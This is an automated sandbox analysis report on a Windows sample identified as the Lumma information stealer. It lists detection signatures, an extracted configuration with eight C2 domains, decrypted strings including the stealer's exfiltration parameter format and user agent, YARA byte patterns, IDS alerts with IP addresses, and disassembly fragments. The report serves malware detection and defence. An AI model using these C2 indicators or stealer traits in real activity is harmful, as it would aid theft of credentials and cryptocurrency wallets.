Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
sqJIHyPqhr.exe

Overview

General Information

Sample name:sqJIHyPqhr.exe
renamed because original name is a hash value
Original sample name:fc0ff134aa4c7a6c02f3d502eb17a1d4.exe
Analysis ID:1577877
MD5:fc0ff134aa4c7a6c02f3d502eb17a1d4
SHA1:c8a08842839e36ddc3811f3c3f78951dda942c43
SHA256:ede8801434d59328105f4af419b459a3c5d6c60195cbe8c718bbc529607ddc61
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • sqJIHyPqhr.exe (PID: 7096 cmdline: "C:\Users\user\Desktop\sqJIHyPqhr.exe" MD5: FC0FF134AA4C7A6C02F3D502EB17A1D4)
    • E093.tmp.exe (PID: 6636 cmdline: "C:\Users\user\AppData\Local\Temp\E093.tmp.exe" MD5: 9026F04B1266851659FB62C91BD7F2F3)
      • WerFault.exe (PID: 1328 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6636 -s 1656 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["grannyejh.lat", "aspecteirs.lat", "necklacebudi.lat", "sustainskelet.lat", "crosshuaht.lat", "rapeflowwj.lat", "discokeyus.lat", "energyaffai.lat"], "Build id": "4h5VfH--"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.4891593646.00000000009D9000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0x1428:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    00000004.00000002.2679002116.0000000000999000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0x1080:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
    • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
    00000004.00000002.2678891862.00000000008F0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
    • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
    decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      No Sigma rule has matched
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-18T20:55:46.337579+010020283713Unknown Traffic192.168.2.1249712172.67.220.223443TCP
      2024-12-18T20:55:48.594984+010020283713Unknown Traffic192.168.2.1249715172.67.220.223443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-18T20:55:47.533720+010020546531A Network Trojan was detected192.168.2.1249712172.67.220.223443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-18T20:55:47.533720+010020498361A Network Trojan was detected192.168.2.1249712172.67.220.223443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-18T20:55:46.337579+010020583751Domain Observed Used for C2 Detected192.168.2.1249712172.67.220.223443TCP
      2024-12-18T20:55:48.594984+010020583751Domain Observed Used for C2 Detected192.168.2.1249715172.67.220.223443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-18T20:55:44.631941+010020583741Domain Observed Used for C2 Detected192.168.2.12512161.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-18T20:55:39.186687+010028032742Potentially Bad Traffic192.168.2.1249710172.67.179.207443TCP
      2024-12-18T20:55:40.836777+010028032742Potentially Bad Traffic192.168.2.1249711176.113.115.1980TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: https://rapeflowwj.lat/6Avira URL Cloud: Label: malware
      Source: https://rapeflowwj.lat/apiNAvira URL Cloud: Label: malware
      Source: https://rapeflowwj.lat/apipAvira URL Cloud: Label: malware
      Source: https://rapeflowwj.lat/YAvira URL Cloud: Label: malware
      Source: https://rapeflowwj.lat/apisAvira URL Cloud: Label: malware
      Source: https://post-to-me.com/track_prt.php?sub=0&cc=DEf6Avira URL Cloud: Label: malware
      Source: https://rapeflowwj.lat/Avira URL Cloud: Label: malware
      Source: https://rapeflowwj.lat/api1Avira URL Cloud: Label: malware
      Source: https://rapeflowwj.lat/apiAvira URL Cloud: Label: malware
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZRZDXR93\ScreenUpdateSync[1].exeAvira: detection malicious, Label: HEUR/AGEN.1312567
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeAvira: detection malicious, Label: HEUR/AGEN.1312567
      Source: 4.2.E093.tmp.exe.400000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["grannyejh.lat", "aspecteirs.lat", "necklacebudi.lat", "sustainskelet.lat", "crosshuaht.lat", "rapeflowwj.lat", "discokeyus.lat", "energyaffai.lat"], "Build id": "4h5VfH--"}
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZRZDXR93\ScreenUpdateSync[1].exeReversingLabs: Detection: 68%
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeReversingLabs: Detection: 68%
      Source: sqJIHyPqhr.exeReversingLabs: Detection: 73%
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZRZDXR93\ScreenUpdateSync[1].exeJoe Sandbox ML: detected
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeJoe Sandbox ML: detected
      Source: sqJIHyPqhr.exeJoe Sandbox ML: detected
      Source: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: rapeflowwj.lat
      Source: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: crosshuaht.lat
      Source: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: sustainskelet.lat
      Source: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: aspecteirs.lat
      Source: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: energyaffai.lat
      Source: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: necklacebudi.lat
      Source: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: discokeyus.lat
      Source: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: grannyejh.lat
      Source: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: rapeflowwj.lat
      Source: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: lid=%s&j=%s&ver=4.0
      Source: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: TeslaBrowser/5.5
      Source: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: - Screen Resoluton:
      Source: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: - Physical Installed Memory:
      Source: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: Workgroup: -
      Source: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: 4h5VfH--

      Compliance

      barindex
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeUnpacked PE file: 0.2.sqJIHyPqhr.exe.400000.0.unpack
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeUnpacked PE file: 4.2.E093.tmp.exe.400000.0.unpack
      Source: sqJIHyPqhr.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
      Source: unknownHTTPS traffic detected: 172.67.179.207:443 -> 192.168.2.12:49710 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.220.223:443 -> 192.168.2.12:49712 version: TLS 1.2
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_004389F2 FindFirstFileExW,0_2_004389F2
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_024D8C59 FindFirstFileExW,0_2_024D8C59
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then movzx esi, byte ptr [ebp+ebx-10h]4_2_0043C767
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then jmp eax4_2_0042984F
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-0Dh]4_2_00423860
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov edx, ecx4_2_00438810
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 5E874B5Fh4_2_00438810
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then cmp dword ptr [edx+edi*8], BC9C9AFCh4_2_00438810
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then test eax, eax4_2_00438810
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov byte ptr [edi], al4_2_0041682D
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+18h]4_2_0041682D
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx-75h]4_2_0041682D
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov word ptr [ecx], bp4_2_0041D83A
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then push C0BFD6CCh4_2_00423086
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then push C0BFD6CCh4_2_00423086
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]4_2_0042B170
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov eax, dword ptr [esp+00000080h]4_2_004179C1
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], E5FE86B7h4_2_0043B1D0
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov ebx, eax4_2_0043B1D0
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov word ptr [ecx], dx4_2_004291DD
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov ecx, dword ptr [ebp-20h]4_2_004291DD
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov ebx, eax4_2_00405990
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov ebp, eax4_2_00405990
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov ebx, esi4_2_00422190
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov word ptr [ebx], cx4_2_00422190
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h4_2_00422190
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov byte ptr [edi], cl4_2_0042CA49
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov byte ptr [esi], al4_2_0042DA53
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-7D4F867Fh]4_2_00416263
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+61D008CBh]4_2_00415220
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then push esi4_2_00427AD3
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov byte ptr [edi], cl4_2_0042CAD0
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov word ptr [ebx], ax4_2_0041B2E0
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then push ebx4_2_0043CA93
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov word ptr [eax], cx4_2_0041CB40
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov word ptr [esi], cx4_2_0041CB40
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov word ptr [eax], cx4_2_00428B61
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov byte ptr [edi], cl4_2_0042CB11
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov byte ptr [edi], cl4_2_0042CB22
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax]4_2_0043F330
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov ebx, eax4_2_0040DBD9
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov ebx, eax4_2_0040DBD9
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh]4_2_00417380
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then cmp word ptr [ebx+edi+02h], 0000h4_2_0041D380
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then cmp al, 2Eh4_2_00426B95
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edx]4_2_00435450
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh]4_2_00417380
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then push 00000000h4_2_00429C2B
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov word ptr [ecx], dx4_2_004291DD
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov ecx, dword ptr [ebp-20h]4_2_004291DD
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]4_2_004074F0
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]4_2_004074F0
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]4_2_0043ECA0
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 9C259492h4_2_004385E0
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then jmp eax4_2_004385E0
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx-7D4F88C7h]4_2_00417DEE
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov ecx, eax4_2_00409580
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov word ptr [ebp+00h], ax4_2_00409580
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then jmp dword ptr [0044450Ch]4_2_00418591
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov eax, dword ptr [ebp-68h]4_2_00428D93
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then xor edi, edi4_2_0041759F
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov eax, dword ptr [0044473Ch]4_2_0041C653
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov edx, ebp4_2_00425E70
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then jmp dword ptr [004455F4h]4_2_00425E30
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov ecx, eax4_2_0043AEC0
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then xor byte ptr [esp+eax+17h], al4_2_00408F50
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov byte ptr [edi], bl4_2_00408F50
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]4_2_0042A700
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then lea edx, dword ptr [ecx+01h]4_2_0040B70C
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov byte ptr [esi], al4_2_0041BF14
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov eax, dword ptr [ebx+edi+44h]4_2_00419F30
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+423C9D38h]4_2_0041E7C0
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then movzx eax, word ptr [edx]4_2_004197C2
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov word ptr [edi], dx4_2_004197C2
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov word ptr [esi], cx4_2_004197C2
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov ecx, ebx4_2_0042DFE9
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then jmp ecx4_2_0040BFFD
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov esi, eax4_2_00415799
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov ecx, eax4_2_00415799
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]4_2_0043EFB0
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov edx, ebp4_2_009160D7
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-0Dh]4_2_00914031
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx-7D4F88C7h]4_2_00908055
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov eax, dword ptr [ebx+edi+44h]4_2_0090A197
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then xor byte ptr [esp+eax+17h], al4_2_008F91B7
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov byte ptr [edi], bl4_2_008F91B7
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov ecx, eax4_2_0092B127
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov byte ptr [esi], al4_2_0090C17B
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then push C0BFD6CCh4_2_009132ED
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]4_2_0092F217
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov word ptr [eax], cx4_2_0090D230
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov word ptr [esi], cx4_2_0090D230
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov ecx, ebx4_2_0091E250
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then jmp ecx4_2_008FC264
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]4_2_0091B3D7
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov ebx, esi4_2_009123F7
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov word ptr [ebx], cx4_2_009123F7
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h4_2_009123F7
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+61D008CBh]4_2_00905487
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then jmp dword ptr [004455F4h]4_2_009164DA
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-7D4F867Fh]4_2_009064CA
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov word ptr [ecx], dx4_2_00919444
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov ecx, dword ptr [ebp-20h]4_2_00919444
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax]4_2_0092F597
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh]4_2_009075E7
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then cmp word ptr [ebx+edi+02h], 0000h4_2_0090D5E7
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov word ptr [ebx], ax4_2_0090B547
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edx]4_2_009256B7
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov ecx, eax4_2_008F97E7
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov word ptr [ebp+00h], ax4_2_008F97E7
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]4_2_008F7757
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]4_2_008F7757
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov eax, dword ptr [0044473Ch]4_2_0090C8BA
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 9C259492h4_2_0092887B
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then jmp eax4_2_0092898E
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then movzx esi, byte ptr [ebp+ebx-10h]4_2_0092C9CE
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]4_2_0091A967
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then lea edx, dword ptr [ecx+01h]4_2_008FB973
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then jmp eax4_2_00919AB5
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov word ptr [ecx], bp4_2_0090DAB8
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+6D2CC012h]4_2_00904ACD
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+423C9D38h]4_2_0090EA27
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then movzx eax, word ptr [edx]4_2_00909A29
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov word ptr [edi], dx4_2_00909A29
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov word ptr [esi], cx4_2_00909A29
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov edx, ecx4_2_00928A77
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 5E874B5Fh4_2_00928A77
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then cmp dword ptr [edx+edi*8], BC9C9AFCh4_2_00928A77
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then test eax, eax4_2_00928A77
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+6D2CC012h]4_2_00904BD2
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov ebx, eax4_2_008F5BF7
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov ebp, eax4_2_008F5BF7
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov byte ptr [edi], al4_2_00906B2A
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov byte ptr [edi], cl4_2_0091CCB0
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov byte ptr [esi], al4_2_0091DCBC
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then push ebx4_2_0092CCFA
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov eax, dword ptr [esp+00000080h]4_2_00907C28
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then xor edi, edi4_2_00907C28
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov esi, eax4_2_00905C41
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov byte ptr [edi], cl4_2_0091CD89
